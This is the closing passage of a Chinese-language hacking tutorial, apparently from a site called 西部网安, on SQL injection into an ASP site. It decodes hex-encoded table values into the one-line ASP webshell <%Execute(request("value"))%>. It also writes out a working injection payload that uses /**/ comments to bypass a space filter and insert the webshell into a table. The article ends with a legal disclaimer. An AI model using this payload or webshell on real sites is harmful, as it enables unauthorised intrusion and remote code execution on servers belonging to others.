通过检索发现问题：

表cmd中的内容为：0x3C457865637574652872657175657374282276616C75652229293E
表shit_tmp内容为：0x3C25657865637574652872657175657374282276616C7565222929253E

这些都是十六进制数，解释成字符就是<Execute(request("value"))>和<%Execute(request("value"))%>
这样就真相大明了，因为这个注入点过滤了%和空格所以在提交：user_id=1996';insert/**/into/**/cmd/**/(a)/**/values/**/('<%Execute(request("value"))%>')-- 时%号被过滤，实际上相当于提交了：user_id=1996';insert/**/into/**/cmd/**/(a)/**/values/**/('<Execute(request("value"))>')--这样导出的ASP文件当然不能用了。
  不过还有些不明白的地方，为什么执行了一句插入语句，数据表却出现四条相同的记录呢？按道理讲不通呀！应该是执行一句只添加一条记录才对，这个问题还是留给聪明的读者您来思考吧！最后提醒各位网络爱好者非法入侵电脑系统，恶意破坏计算机网络是违法的事情，除非绝对必要请不要修改人家计算机上的任何文件，以免给自己带来不必要的麻烦。

你复制的文字来自西部网安

共2页: 上一页 [1] 2 下一页